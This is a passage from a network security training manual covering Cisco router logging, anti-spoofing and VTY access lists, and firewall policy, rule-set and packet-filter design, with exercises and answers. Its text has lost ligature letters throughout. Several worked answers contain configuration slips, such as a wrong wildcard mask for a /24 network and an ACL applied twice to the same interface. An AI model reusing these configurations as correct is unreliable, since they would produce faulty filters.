name of the level, such as
Alerts. In IOS 12.0 and
newer versions, you can use
either the name of the level
or the number of the level.
Lesson 3: Routers and Access Control Lists 147
Router#configure terminal
Router(config)#logging on
Router(config)#logging buffered 16000 critical
Router(config)#service timestamp log date msec localtime
show-timezone
Router(config)#^Z
Router#
In this example, the amount of memory that has been allocated is 16 KB. The
logs will go to the buffer and will be recorded if they are level 2 (Critical) or
higher. Finally, full timestamping is used, including the local time and the time
zone options.
Terminal Logging
Normally, there are no messages sent to terminal sessions. This is for bandwidth
purposes and, in some situations, security purposes. In order to allow logging to
be visible on a VTY session, the terminal monitor command must be used.
The following conguration fragment shows logging set to level 5, and to be sent
to the VTY sessions.
Router#configure terminal
Router(config)#logging on
Router(config)#logging monitor 5
Router(config)#^Z
Router#terminal monitor
Router#
In this example, the terminal session will receive all level 5 and higher messages.
This is the rst example that uses the numeric value of the level instead of the
name, an indicator that the router must be at least IOS version 12.0. There is a
second part for terminal logging. The above fragment will tell the router to log
messages to the VTY sessions, but the VTY sessions have not been congured to
see the messages. The terminal monitor command enables the VTY session
to actually view the messages on screen. In the event that the logs become to
numerous or are no longer needed, the terminal no monitor command can
be used to stop viewing the logs on the VTY session.
Syslog Logging
Cisco routers have the ability to send their log messages to a server that is run-
ning as a syslog server. This is a highly recommended method of logging in a
production environment. Routers collect the log messages, just as they normally
do. However, instead of showing them on the console, or storing them in
memory, they are sent to a server that will manage the messages and store them
to the servers hard drive.
This will allow for long-term storage and analysis of the information and will not
be subject to real time analysis or memory constraints. Most UNIX and Linux
servers have some version of the syslog server function, and there are many
syslog applications for Windows systems on the market.
148 Tactical Perimeter Defense
To congure syslog logging on a Cisco router, there are four components:
The destination host is any host that can be located using a host name, DNS
name, or an IP address.
The syslog facility is the name to use to congure the storage of the mes-
sages on the syslog server. Although there are quite a few facility names, the
routers will use the ones named Local0 through Local7.
The severity level of the logs can be viewed as similar to that of the other
log messages, using the Cisco severity levels.
The source interface for the messages is the actual network interface that
will send the messages to the Syslog server.
The following conguration fragment shows the setup of a router to use a syslog
server.
Router#configure terminal
Router(config)#logging on
Router(config)#logging trap 5
Router(config)#logging host 10.20.30.45
Router(config)#logging facility Local5
Router(config)#logging origin-id hostname
Router(config)#logging source-interface Ethernet 0
Router(config)#^Z
Router#
In this example, logging has been enabled. Logging is going to be sent to a
syslog server, logging messages that are level 5 or more critical. The IP address
of the syslog server is 10.20.30.45. (Additional servers can be used with multiple
commands using different IP addresses here, for redundancy.) The facility on the
syslog server is Local5, the origin-id is the hostname (Router in this example),
and the source for these messages is Ethernet 0 on the router.
TASK 3F-1
Configuring Buffered Logging
1. Create the conguration fragment you would use for buffered logging,
using 32 kilobytes of memory. Include all timestamping options and log
level 4 events. Assume that the router is running IOS version 12.2.
Router#configure terminal
Router(config)#logging on
Router(config)#logging buffered 32000 4
Router(config)#service timestamp log date msec localtime
show-timezone
Router(config)#^Z
Router#
ACL Logging
The previous section on logging focused on the system log events, critical errors,
and messages. Another important area to investigate is the use of logging in rela-
tionship to your Access Control Lists. When implemented, ACL logs are listed as
Level 6 events.
Lesson 3: Routers and Access Control Lists 149
In order to implement ACL logging, the commands are very simple. All you need
to add is the keyword log or log-input to the end of the ACL statements.
You do not want to add this line to all your ACL statements, however, or you
will ood your logs with so much information that you will be virtually unable to
identify anything useful.
Use of the log keyword will list the type, date, and time in the ACL log, and is
a valid option only for standard ACLs on IOS version 12.0 and newer. The
log-input keyword adds information on the interface and source MAC
address, and an example of the use of this is if the same ACL is to be applied to
more than one interface.
Logging may be one reason that you do not count on the default deny all rule of
an ACL. If a packet is dropped due to the default deny all statement, that packet
will not be logged. If, however, you add the following line as your last statement
in the ACL, then packets will be logged: access-list 123 deny ip
any any log.
Anti-spoofing Logging
Earlier, you looked at the creation of anti-spoong ACLs. In this section, you will
see these ACLs used with the logging function to gather information for analysis.
In these examples, assume that the internal network is 172.16.0.0/16. First, the
conguration fragment of the list itself:
Router#configure terminal
Router(config)#access-list 123 deny ip 172.16.0.0 0.0.255.255
any log-input
Router(config)#access-list 123 permit ip any any
Router(config)#access-list 145 permit ip 172.16.0.0 0.0.255.255
any log-input
Router(config)#access-list 145 deny ip any any log-input
Router(config)#^Z
Router#
For the next example, assume that the router has one internal Ethernet interface
(where the trusted network is located) and has two external serial interfaces. The
following conguration fragment shows the application of the ACLs, rst list 123
then list 145, on their proper interfaces.
Router#configure terminal
Router(config)#interface Serial 0
Router(config-if)#ip access-group 123 in
Router(config-if)#exit
Router(config)#interface Serial 1
Router(config-if)# ip access-group 123 in
Router(config-if)#exit
Router(config)#interface Serial 0
Router(config-if)# ip access-group 145 out
Router(config)#^Z
Router#
VTY Logging
When gaining access to the router, a primary method used was through VTY
sessions. These sessions may come under frequent attacks at larger organizations.
You will want to know who is and who is not successful at gaining access via
VTY sessionsagain, logging is the answer to that need.
150 Tactical Perimeter Defense
In this example, you will again assume the internal network 172.16.0.0/16, and
that there is only one trusted host that has authorized VTY access, 172.16.23.45.
With those variables dened, the following is the conguration fragment that will
log VTY sessions on the router.
Router#configure terminal
Router(config)#access-list 155 permit host 172.16.23.45 any
log-input
Router(config)#access-list 155 deny ip any any log-input
Router(config)#^Z
Router#
Once you have created the list, as shown, you will need to apply the list. In the
following conguration fragment, the list is applied to VTY sessions 0 through 4.
Router#configure terminal
Router(config)#line vty 0 4
Router(config)#access-class 155 in
Router(config)#^Z
Router#
TASK 3F-2
Configuring Anti-spoofing Logging
1. Create a logged ACL that is used for anti-spoong, using the following
information: The router has interfaces Ethernet0, Serial0, and Serial1.
Ethernet0 is connected to the only trusted network, which has the IP
address 192.168.45.0/24. For this exercise, and in the interest of time,
only create anti-spoong for the dened network. If you want to expand
this to include all private and reserved networks, you can do so, but it is
not required.
Router#configure terminal
Router(config)#access-list 160 deny ip 192.168.45.0
0.255.255.255 any log-input
Router(config)#access-list 160 permit ip any any
Router(config)#access-list 170 permit ip 192.168.45.0
0.255.255.255 any log-input
Router(config)#access-list 170 deny ip any any log-input
Router(config)#^Z
Router#
Router#configure terminal
Router(config)#interface Serial 0
Router(config-if)#ip access-group 160 in
Router(config-if)#exit
Router(config)#interface Serial 1
Router(config-if)# ip access-group 160 in
Router(config-if)#exit
Router(config)#interface Serial 0
Router(config-if)# ip access-group 170 out
Router(config)#^Z
Router#
Lesson 3: Routers and Access Control Lists 151
Summary
In this lesson, you examined the fundamentals of router security and the
principles of routing. You created the congurations that are required to
harden a Cisco router and congured the removal of services and protocols.
You examined the process of the wildcard mask and how it relates to the
Cisco ACL. You created the congurations for ACLs to defend the network
against attacks. Finally, you examined the process of logging on a Cisco
router and congured buffered and anti-spoong logging.
Lesson Review
3A What is authentication?
Authentication is the process of identifying a user, generally granting or
denying access.
What is authorization?
Authorization is the process of dening what a user can do, or is authorized
to do.
What is AAA?
Authentication, Authorization, and Accounting.
What are the methods of access to a Cisco router?
Console port
Auxiliary port
VTY sessions
HTTP
TFTP
SNMP
3B List some of the advantages of using static routing.
Responses might include:
Precise control over the routes that data will take across the network.
Easy to congure in small networks.
Reduced bandwidth use, due to no excessive router traffc.
Reduced load on the routers, due to no need to make complex routing
calculations.
What is a security advantage to using RIPv2 over RIPv1?
Using RIPv2 provides the security advantage of authentication, enabling the
routers to identify who is and who is not able to update routing information.
152 Tactical Perimeter Defense
3C What is a security reason for disabling CDP?
CDP might be broadcasting information about the router that is not intended
to be public knowledge.
What is an attack that you can defend against by disabling ICMP
directed broadcasts?
Smurf.
3D What type of Access Control List allows for the checking of port num-
bers?
Extended ACLs allow for port checking.
When a packet enters the router, what is the rst thing the router will
check regarding that packet?
Is there a route for this packet? If yes, send to the ACLs if there are any; if
no, discard the packet (and respond to the sender if need be).
3E What is the syntax for a standard Access Control List?
Router(config)#access-list access-list-number
{permit|deny} source [source-mask]
What is the syntax for an extended Access Control List?
Router(config)#access-list access-list-number
{permit|deny}protocol source source-mask destination
destination-mask
[operator|operand]
What is the syntax for implementation of a standard Access Control
List?
Router(config-if)#ip access-group access-list-number
{in|out}
3F When a conguration change is made to the router, such as an interface
being brought down, what level of message will this generate?
Level 5.
What is the command for an access list to be implemented on the VTY
sessions?
access-class [access list number] in
Lesson 3: Routers and Access Control Lists 153
154 Tactical Perimeter Defense
Designing Firewalls
Overview
In this lesson, you will be introduced to the concepts and technologies used
in designing rewall systems. You will identify the methods of implement-
ing rewalls in different scenarios, using different technologies. The
strategies and concepts in this lesson are important in understanding later
lessons.
Objectives
To identify the design and implementation issues of rewall systems, you will:
4A Examine the principles of rewall design and implementation.
Given a rewall system, you will identify and describe methodologies of
rewall function and implementation.
4B Create a rewall policy based on provided statements.
Given the answers to questions regarding the rewall, you will create a
rewall policy statement.
4C Create a rule set to be used with a packet lter.
Given a network scenario, you will create a rule set for a packet ltering
rewall.
4D Describe the function of a proxy server.
Given a network scenario, you will describe the process of internal clients
using a proxy server to access Internet web pages.
4E Describe how a bastion host is included in the security of a network.
Given a network scenario, you will describe how the creation of a bastion
host functions in the security of the network.
4F Describe the function of a honeypot in a network environment.
Given a network running Windows 2003, describe the function of an
effective honeypot in the security of the network.
Data Files
none
Lesson Time
2 hours
LESSON
4
Lesson 4: Designing Firewalls 155
Topic 4A
Firewall Components
The concept of Network Security today is a varied and challenging topic to
discuss. There are so many different areas of the network architecture to be con-
cerned with, ranging from messaging systems to databases, from le and print
solutions to remote network access. In between these areas of our network, we
nd things such as access control solutions, user control policies (group policies
in a Windows environment), and a host of settings, functionality and options that
serve to confuse and confound the average user of a computer in a domain based
network today.
It was not that long ago that security and the protection of network based assets
was clearly the domain of the network engineer, that person who was technically
savvy, highly skilled, and often times hard to talk to and understand if you were
not also a network engineer.
The challenges faced by these network engineers, access control, asset protection,
and risk mitigation, have not changed at all, and yet at the same time, the tech-
nology used to address these issues has undergone startling transformations in
both the areas of complexity, as well as capability. One need only look at the
advances in the area of the rewall to see all too clearly how this transformation
has had a direct, undeniable, and profound impact both on network security and
on users perceptions of that security, and the people that provide it.
The following image in an example of a simple rewall
Figure 4-1: An example of a single rewall.
The rewall itself is positioned logically between the internal network (the LAN)
and the external network (the WAN). The rewall sits there performing its job,
denying and granting access based on rules that the network/security administra-
tor has created and assigned to the device.
156 Tactical Perimeter Defense
Over the last few years, providing this option to simply grant or deny access has
typically been enough to provide a basic level of security and protection to most,
if not all of our networks. The challenge that has been steadily rising in relation
to the provision of basic security, has been that the hackers and the enemies of
the networks that are protected by rewalls have not been content to sit back and
quit trying to gure out how to break the security afforded by the rewalls.
As a result, the addition of new features and options for the rewall has become
a very important part of the continuing evolution of network security overall, and
the ability to protect our networks from unauthorized and unwanted network
access and traffic in particular.
In addition to denying and granting access, now a rewall may offer one or more
of the following services:
Network Access Translation (NAT): NAT is used by the router to translate
internal private IP addresses to external IP addresses.
Data Caching: This option allows the router to store data that is accessed
often by network clients.
Restriction on Content: This option is available in many newer systems,
allowing the administrator to control Internet access based on keyword
restrictions.
Firewall Methodologies
Firewalls have two general methods of implementing security within a network.
Although there are variations of these two, most modications still boil down to
one or the other. They are:
Packet ltering
Proxy servers (application gateway)
Packet ltering was the rst type of rewall used by many organizations to pro-
tect their networks. The general method of implementing a packet lter was to
use a router. These routers had the ability to either permit or deny packets, based
on simple rules the administrator would create.
Even though these rewalls could perform this type of ltering, they were limited
by the fact that they were designed to look at the header information of the
packet only. An example of this drawback would be that a lter could block FTP
access but could not block only a PUT command in FTP.
The addition of proxy server (also known as an application gateway) capabilities
to the rewalls created a much more solid security product than a pure packet
lter was capable of providing on its own. The proxy software can make deci-
sions based on more than the header of a packet.
Proxy servers use software to intercept network traffic that is destined for a given
application. The proxy recognizes the request, and on behalf of the client makes
the request to the server. In this case, the internal client never makes a direct con-
nection to the external server. Instead of a direct connection, the proxy functions
as the man-in-the-middle and speaks to both the client and server, relaying their
messages back and forth.
The major advantage to this is that the proxy software can be instructed to permit
or deny traffic based upon the actual data in the packet, not simply the header. In
other words, the proxy is aware of communication methods, and will respond
accordingly, not just open and close a port in a given direction.
Lesson 4: Designing Firewalls 157
What a Firewall Cannot Do
So if a rewall can use packet ltering, proxy services, a combination of both, or
custom ltering to create secure environments for our data, the logical question
that we have to ask is what cant a rewall do to protect the network? All too
often a network/security administrator is told to go and buy a rewall to secure
the network.
Unfortunately, as is usually the case, this is the extent of the conversation. No
other discussion(s) takes place that would allow the network/security administra-
tor to gain a better understanding of the reason(s) behind the need for a rewall,
and what the goal of placing the rewall within the network topology is supposed
to accomplish.
In relation to our network/security administrator, and their quandary about having
to purchase a device that will do a large number of things, all, or most of which,
might or might not be necessary for the network security issue(s) in question, it
will be helpful for us to briey look at what a rewall cannot do, so we can
begin to understand what it can do.
A few areas where a rewall will have difficulty in securing the network are as
follows:
Viruses: Some rewalls do have the ability to detect virus traffic, however
attackers can package a virus in so many forms and rewalls are not
designed as anti-virus systems, that this is not a primary function of a
rewall. Your rewalls may be able to identify some virus traffic, but you
should always use internal anti-virus software.
Employee misuse: This is a hard point, but a valid one. Employees often do
things unknowingly. They may respond to forged email addresses, or they
may run programs that come from friends, assuming they are safe.
Secondary connections: If employees have modems in their computers
and/or are able to use a wireless network connection, they may make new
connections to the Internet for personal reasons. These connections render
much of the rewall useless to this client. If File and Print Sharing is turned
on, this can lead to adverse results, while the rewall itself may be properly
congured.
Social engineering: If the network administrators gave out rewall informa-
tion to someone calling from your ISP, with no verication, there is a
serious problem.
Poor architecture: Without a well thought out and vetted rewall design, it
becomes very difficult, maybe even impossible to congure the rewall
properly in order to ensure that the necessary security precautions are in
place within the network at all times.
Implementation Options for Firewalls
There is no one correct standard for implementing a rewall within a network.
The following concepts show several different possibilities for rewall
implementations.
158 Tactical Perimeter Defense
A Single Packet Filtering Device
As shown in the following gure, the network has been protected by a single
device congured as a packet lter, permitting or denying access based on the
contents of the packet headers.
Figure 4-2: An example of a single packet ltering device.
A Multi-homed Device
As shown in the following gure, the network is being protected by a device
(most likely a computer) that has been congured with multiple network
interfaces. Proxy software will run on the device to forward packets between the
interfaces.
Figure 4-3: An example of a single multi-homed device as a proxy server.
Lesson 4: Designing Firewalls 159
A Screened Host
As shown in the following gure, the network is protected by combining the
functions of proxy servers and the function of packet ltering. The packet lter
accepts incoming traffic from the proxy only. If a client directly communicates
with the proxy lter, the data will be discarded.
Figure 4-4: An example of a screened host running behind a packet ltering device.
A Demilitarized Zone (DMZ)
In the following gure, the network has a special zone, or area, that has been
created to allow for the placement of servers that need to be accessed by both
Internet and intranet based clients. This special zone, the DMZ, requires two l-
tering devices, (rewalls will traditionally be used for this) and can have
multiple machines existing within its boundary.
160 Tactical Perimeter Defense
Figure 4-5: An example of a Demilitarized Zone (DMZ).
Lesson 4: Designing Firewalls 161
TASK 4A-1
Firewall Planning
Objective: In order to implement rewall systems, you will need to be
able to diagram the different methods used for implementation.
1. Diagram the method described in this topic for the rewall implementa-
tion that most accurately reects your current network design.
162 Tactical Perimeter Defense
If you had a blank check and could design a rewall implementation
for your network, what would that design look like? If it differs from
your current design, please diagram the new solution that you would
build.
Topic 4B
Create a Firewall Policy
Before you can identify conguration options, or implementation techniques, you
must have a rewall policy. In many instances, organizations rush into rewall
selection and installation, without enough thought on how this complex device is
to be used.
For a rewall to be designed and deployed correctly, there must be a rewall
policy in place. While not as complete as an organizational security policy, the
rewall policy has its place. The policy items in place for the rewall are part of
the overall security policy the organization uses.
The rewall policy can generally have one of two viewpoints: either deny every-
thing except what is explicitly allowed, or permit everything except what is
explicitly denied. It is general consensus that the former of the two viewpoints is
used.
Lesson 4: Designing Firewalls 163
It is a good starting point to assume that all traffic is to be denied, except that
which the policy has identied as explicitly being allowed. This also usually turns
out to be less work for the network/security administrator. Imagine creating a list
of all the ports Trojans use, and all the ports for applications your users are not
authorized to use, and then creating rules to block each of them. Compare that to
creating a list of what the users are allowed to use, and granting them access to
those services and applications explicitly.
There are different names for the items that can be included in the security
policy, and the ones that follow are very common. The items include the Accept-
able Usage Statement, the Network Connection Statement, the Contracted Worker
Statement, and the Firewall Administrator Statement.
After building the overall security policy, if it becomes very large (some organi-
zations have policies that are hundreds of pages long), you may want to pull out
and copy the sections related to the rewall and have a separate subdocument for
the rewall alone.
Having subdocuments is not a requirement, but it makes reading the policy much
easier. The subdocuments are easier to index, reference, and view. Many organi-
zations now run an internal web server to house important documents, such as the
policies, for employees. The policy is one of those documents, and the
subdocuments are easier to view and read when only a handful of pages, versus
scrolling through 200 pages of content.
The Acceptable Use Statement
This portion of the policy can take the most time, energy, meetings, and effort to
create. To be able to describe, in detail, the proper usages of a computer within
the network is a difficult task for some organizations. There is a necessary bal-
ance that must be achieved between wanting to maintain tight security and giving
employees the ability to do their jobs.
Of all the potential devices in an organization however, the computer is often the
most misused. It is this misuse that the security policy attempts to control.
Several points to consider when creating this portion of the policy are as follows:
Applications other than those supplied by, or approved by the company are
not to be installed on any computer. This includes any programs that can be
downloaded from the Internet or brought in on CD-ROM, DVD-ROM, USB
device, or oppy disk.
Applications that have been provided for the individual computer in the
organization may not, under any circumstances, be copied or installed onto
any other computer, including the users home computer, unless the organi-
zation has made it clear, through written policy, and participation in an
appropriate licensing program authorized by the vendor, that employees have
the ability to exercise Home Use Rights for the particular software in
164 Tactical Perimeter Defense
question. If a backup copy is required for archive, the organization will be
responsible for creating and storing the archive copy.
Computers may not be left unattended with a user account still logged on. If
a user is temporarily away from the computer, the computer must be left in a
locked state. Screensavers must employ the password protection option.
The computer and its installed applications are to be used for organizational
related activity only.
The computer and its installed applications may not be used in any way to
threaten or harass another individual.
The installed email application is the only authorized email service allowed
for use, and employees may not use this email service for personal use.
From this list, you can see the types of things that are to be covered in the policy.
If there are examples that cannot be implemented on the rewall, even in part,
they may be best located in the overall security policy document for the
organization. Some of the examples given in the previous list fall into that cat-
egory; for example, screensavers, installing applications at home, or threatening
of individuals. These items clearly must be in the security policy, but may not be
items that can be directly implemented on the rewall.
The Network Connection Statement
This portion of the policy involves the types of devices that are to be granted
connections to the network. Here is where you can dene the issues related to the
network operating systems, devices that use the network, and how those devices
must be congured in order to use the network in a secure fashion.
Lesson 4: Designing Firewalls 165
This section may have the most functional use on the rewall, as this section is
dening actual network traffic. Some of the items that may be included in this
portion are:
Network scanning is not to be permitted by any user of the network, other
than those in network administration roles.
Users may access FTP sites to upload and download needed les, but inter-
nal user computers may not have FTP server software installed and running.
Users may access WWW on port 80 as required.
Users may access email on port 25 as required.
Users may not access NNTP on any port.
Users in subnet 10.0.10.0 are allowed to use SSH for remote administration
purposes.
Users not in subnet 10.0.10.0 are not allowed to use SSH to connect to any
location or device.
Users may not run any form of chat software to the Internet, including, but
not limited to, AOL Instant Messenger, Yahoo Chat, IRC, ICQ, and MSN
Chat.
Users may not download les over 5 MB in size.
Anti-virus software must be installed and running on all computers.
Anti-virus updates are required weekly on user computers.
Anti-virus updates are required daily on all servers.
No new hardware (including network cards and modems) may be installed in
any computer by any party other than the network administrators.
No unauthorized links to the Internet from any computer are allowed under
any circumstances.
As you can see this list could go on and on. These are only examples to get you
started. This section can get technical, as in deciding which ports to allow to and
from subnets or computers in the network. This may be where you spend the
most time developing the rewall policy, as it is most relevant to implementation
on the rewall.
The Contracted Worker Statement
This portion of the policy is often overlooked. The policy must address the issue
of contracted, or temporary, workers. These individuals may require only occa-
sional access to resources on the network.
The list of items for the contracted worker statement may overlap with other
areas of the policy but this does not present a problem. Obviously, the feature or
rule would only be implemented once, but it is better to list an item twice than to
assume the item has been covered elsewhere.
166 Tactical Perimeter Defense
Some examples of items in the contracted worker statement portion of the policy
are:
No contractors or temporary workers shall have access to unauthorized
resources.
No contractor or temporary worker shall be permitted to scan the network.
No contractor or temporary worker shall copy data from a computer to a
form of removable media, such as CD-ROM, DVD-ROM, USB device, or
oppy disk.
No contractor or temporary worker may use FTP, unless specically granted
permission in writing.
No contractor or temporary worker will have access to Telnet or SSH unless
specically granted permission in writing.
From these examples, you can see that there are areas which overlap. As the say-
ing goes, it is better to be safe than sorry.
The Firewall Administrator Statement
Some organizations may not have a separate statement for the administrator of
the rewall itself. If yours is one that will require such a statement, here are some
possible examples of the items that could appear in it:
The rewall administrator must be certied by the vendor of the rewall.
The rewall administrator must have SCNA certication.
The rewall administrator must know all the applications authorized to be
installed on computers in the network.
The rewall administrator shall report directly to the Chief Security Officer.
The rewall administrator must be reachable at all times24 hours a day, 7
days a week.
As you can see, this area can almost be considered the job role of the rewall
administrator. Some organizations will have such a policy, others will not. It can
be a benet in a large organization to know these items, and to have them written
in the policy.
From these examples, you can start to build the framework for the security
policy, and, in this case, the specic rewall portion of the policy. The rewall
policy should be a working document that can be modied on a regular basis.
The security world is ever-changing, so be sure your policy changes with it!
TASK 4B-1
Creating a Simple Firewall Policy
1. Read through the following scenario of a corporate network.
The network is a single office, with 200 nodes. Currently, it is connected to
the Internet through a single 64K ISDN, but they are getting 1.5M SDSL
installed in a week, and want to use a rewall on their new connection. The
network is a single Windows NT 4.0 domain with an internal web server and
an internal email server. The internal servers are accessed by employees and
customers over the Internet.
Lesson 4: Designing Firewalls 167
The CEO has stated that email must not be used for personal use and that no
one can download anything harmful to the network or organization. You are
the rewall administrator and have given the CEO a more specic set of
questions, which are answered here:
Your Question The CEOs Answer
Can the users use newsgroups? No.
Can the users run Telnet to the Internet? No.
Can the users visit external websites? Yes.
Are there any websites to be dened as off
limits?
Anything pornographic.
Can users use Instant Messaging software? Only internally.
Can users upload to FTP? No.
Can users download from FTP? Only if it is not a dangerous le.
Can users access external email servers? Yes, if it is company-related.
Who is the rewall administrator? You are.
Is 24x7 rewall support expected? Yes.
Topic 4C
Rule Sets and Packet Filters
Having a solid policy is one important part of preparing to implement the
rewall. Another, is being aware of the different types of rewalls that exist. We
briey discussed rewall methodologies earlier, and now we will focus on packet
ltering.
Packet lters were the rst types of rewalls used to protect networks. Tradition-
ally, packet lters were (and are still) implemented as access control lists on
routers. This single border security device was all that was needed for quite some
time.
The router becomes the single access point to the network, and the place where
the packet ltering functions. In the following gure, you can see examples of
where the router may be located. The function of the packet lter will differ
based on its location in the scheme of the network.
168 Tactical Perimeter Defense
Figure 4-6: An example of the location of packet lters.
In the rst example, there is only a single device running as the packet lter for
the network. This device will have to be congured very well, as the security of
the network is riding on its rules.
In the second example, the packet lter must be carefully congured not to allow
direct access from clients on the internal network to the Internet. Likewise, it
must be congured so that traffic from the Internet cannot directly reach the inter-
nal clients.
In the third example, a DMZ has been created. This requires the two devices to
be congured differently. As such, the packet lter directly connected to the
Internet must be secured to allow access to the hosts on the DMZ, but not the
internal network. The packet lter connected to the internal network must be
secured so that clients can access the hosts on the DMZ, but not the Internet
directly.
The Packet Filter Rules
Regardless of the implementation of packet lter that is used, there must be a set
of rules in place for the packet lter to use in making decisions. For creating the
rules, you can consult your rewall policy, as discussed earlier.
The general questions that should be answered are:
Which services are to be allowed to access the Internet from the intranet?
Which services are to be allowed to access the intranet from the Internet?
Which hosts are allowed specic access that others do not have?
Lesson 4: Designing Firewalls 169
Although each product will have different methods of implementing these rules,
there are some basic considerations that apply to nearly all packet ltering
devices. They include:
The interface to which the rule will apply. For example, is it the internal
network interface, or the external Internet connection?
The direction of the packet. Will this rule apply to packets that are entering
on the dened interface, or does it apply to packets that are leaving on the
interface?
Addresses used to make the decision. Will the rule base its decision on the
source IP address, destination IP address, or both?
Ports used to make the decision. Will the rule base its decision on the source
port, destination port, or both?
Higher level protocols. Is this rule to be based on the protocol using IP, such
as UDP or TCP?
Ports and Sockets
Before we can get into the specics of the rules, we need to review TCP/IP,
ports, and sockets. This is shown in the following gure. The IP address species
the host that is communicating, and the port identies the actual end-points of the
network communication. Ports allow for multiple connections to different applica-
tions via the same two hosts at any given moment. A socket is an IP address
combined with a port number.
Since the rst 1023 ports are dened as privileged, ports higher than 1023 must
be used for return communication of common protocols. In other words, when
you request a web page at port 80, it is returned to you at a port higher than
1023.
Figure 4-7: An example showing ports in exchange of a web page.
Keeping this in mind, lets look at some rules that can be created with the packet
lter. Assume it is the goal to only allow access to web pages on the Internet and
the DMZ; the Internet can access web pages on the web server, and all other ser-
vices are not to be allowed access to the Internet. The following gure depicts
rules for a rewall.
170 Tactical Perimeter Defense
Figure 4-8: Building rules for the rewall.
In this case, the rst rule allows the Internet to access port 80 of the web server,
which can respond on any port higher than 1023, the second rule. The third rule
allows outbound requests to external web servers on port 80, and the fourth
allows those requests to be returned. The nal rule disallows all other traffic.
Is this a good set of rules? No! While it may initially look like it does the
requested job, it has in fact left most of the network side open. The rewall will
accept connections from the whole world on ports higher than 1023. This was not
the intention. A simple Trojan horse program could take the network down, as if
there were no rewall in place.
To increase the security of the network then, another level is required. This next
level is used to dene the source and destination ports. For example, rule number
2 should add port information for both the source and destination. It could then
state: outbound traffic is ne to go to ports higher than 1023, if the data origi-
nated from port 80. Likewise, rule 4 could state that data may be accepted higher
than 1023 if it came from port 80. Youll see an example of what rule 4 should
not look like in the following gure.
Figure 4-9: The highlighting of rule 4, adding source and destination ports. Note this
example leaves the high ports open, which is not considered good security.
These additions increase the security of the rule set substantially. There should
never be an open rule like rule number 4 shown here.
The Ack Bits
Another option to add to the rule set that can increase security involves the ack
bit. This bit is set only in response to a request. When a packet is sent to estab-
lish the connection, this bit is a zero; when the reply is returned, the bit is set to
a one. Your rewall can examine this bit to ensure that the packet is indeed a
reply to communication that originated inside the network.
Adding the ack bit on top of the source and destination ports in the previous
example increases security. An example of what this rule may now look like is
shown in the following gure.
Lesson 4: Designing Firewalls 171
Figure 4-10: Rule 4, with the additional ACK bit.
Now if we look at this same rule with our added functions of source and destina-
tion port, and the inclusion of the ack bit, we can see that the rewall rule has
become more secure. In order for a packet to meet this rule, it must have origi-
nated from port 80, have the ack bit set, and a destination port higher than 1023.
We can feel comfortable with this rule now that it has been tightened.
Stateless and Stateful Packet Inspection
Now that you have an idea of where and how packet lters can be placed in the
defense of a network, we will discuss the types of packet lters.
Packet lters fall into one of two major categories:
Stateless packet lters, sometimes called standard packet lter.
Stateful packet lters.
Stateless Packet Filters
As we have discussed, packet lters are generally implemented on border routers,
using a given set of rules. The theory behind a packet lter is that it may make a
decision about a packet based on any portion of the protocol header; however, the
vast majority of lters are based on the most signicant information in the
header. Those areas being:
IP address ltering.
TCP or UDP port numbers.
Protocol type.
Fragmentation.
IP Address Filtering
IP address ltering is perhaps the oldest form of packet ltering. If you want to
block access to a specic host, create a rule that says that IP address is off-limits.
If you want to grant access to an entire subnet, create a rule that says that subnet
has access. The IP address lters allow for permitting or denial of addresses,
using only the IP address to make the decision.
If the lter were to try to dene all the hosts that are to be denied, the rule set
would get very long, and a rule like that for individual hosts in a large organiza-
tion is unreasonable. Since the rule set can get very long, the odds of making a
mistake are increased, and therefore, it is not a good way to implement strong
security in a large organization.
Using the lter to specically grant access by an IP address, on the other hand,
can be much more effective. The areas that hosts will be allowed to access will
be, by the very nature of security, a lesser number than the areas in which hosts
are not allowed access.
172 Tactical Perimeter Defense
Using primarily allowed addresses over denied addresses makes the implementa-
tion of the rules easier. And, it makes the task of the attacker a bit harder. The
attacker would have to learn the list of approved addresses to attempt an attack.
When the attacker does nally learn the addresses, he or she can spoof the source
IP address and get a packet past the lter.
If the attacker was trying to execute a denial of service attack (DoS), this will get
them past the packet lter with no problems. If the attacker was performing a
different type of attack, where the return packet was not needed, this type of lter
is easily bypassed with spoofed source packets.
TCP and/or UDP Port Numbers
Dealing with the Internet, using TCP and/or UDP port numbers in the packet l-
ter will increase its effectiveness. Filtering at this level, in addition to the IP
address, is commonly used in most networks today. If the host is running only the
WWW service, there is no need to have any port open other than 80 (or 443, if
SSL has been added).
As with IP addresses, it is much easier to open the ports that are needed, versus
closing the ports that are to be denied. With over 65,000 ports to open or close,
no doubt most people would agree.
Protocol Filtering
In the event that using port numbers of UDP and TCP are still not enough, you
can resort to protocol ltering. Packet ltering of this type investigates the con-
tents of the header to determine the upper layer protocol used. If there is a match,
accept or discard. The protocols you may choose to block or accept are few:
TCP
UDP
ICMP
IGMP
Although this type of ltering can be used, it is very limitinguse caution when
employing this strategy. If you have a server running a service that uses UDP,
and that is the only authorized service on the server, then allow only UDP. But,
be aware that such a move removes the option of troubleshooting utilities such as
ping, due to the lack of ICMP.
Fragmentation
When networks and routing were rst developed, many of the links used had
very small bandwidth capabilities. Due to this, large les transmitted across the
Internet had to be broken into several pieces. This is known as fragmentation.
When packet lters inspect the header, if the packet is a fragment, they will see
the port number, protocol type, IP address, and an indicator that this is fragment
0. Herein lies the problem: fragments 1 through x do not contain this same infor-
mation, so the packet lter has nothing to use in making a decision.
The packet lters would drop fragment 0, and allow the remaining packets
through. The logic was that without the fragment 0, the packet could not be used.
This was not always the case.
Lesson 4: Designing Firewalls 173
Smart and very TCP/IP savvy attackers would create entire attacks that begin
with fragment 1. The attackers were aware that many versions of TCP/IP would
go ahead and reassemble fragments even if fragment 0 was missing. These
attacks would pass through the packet lter as if it were not even there.
Stateful Packet Filters
It should be obvious by now, that despite their best efforts, stateless packet lters
simply are not good enough for the security needs of todays networks. The logic
a stateless packet lter employs is not complete.
Stateful packet lters still employ the same techniques as stateless packet lters,
but they do not base their decisions on single packets. A decision cannot be made
on a single packet-by-packet basis alone, if the network is expected to be safe.
That single packet does not describe the overall communication that is occurring
between the two hosts.
The way that stateful packet lters have increased security is by remembering the
state of connections at the network and the session layers as they pass through
the lter. This session information is stored and analyzed on all packets moving
through the lter.
For example, if a client on the internal network initiates a connection to an
unknown host on the Internet, it sends the SYN along with the IP address and
port number for the destination host. As this packet passes through the lter, an
entry is made into the state table logging the connection information. When the
lter receives the return packet, it can look at its table and see that the address,
port number, and SYN/ACK setting match what is expected.
In the event that a packet is received and there is no entry in the table for this
packet, then the packet is dropped. The following gure shows an example of the
steps of the stateful packet inspection.
Figure 4-11: The Stateful Packet Filter function.
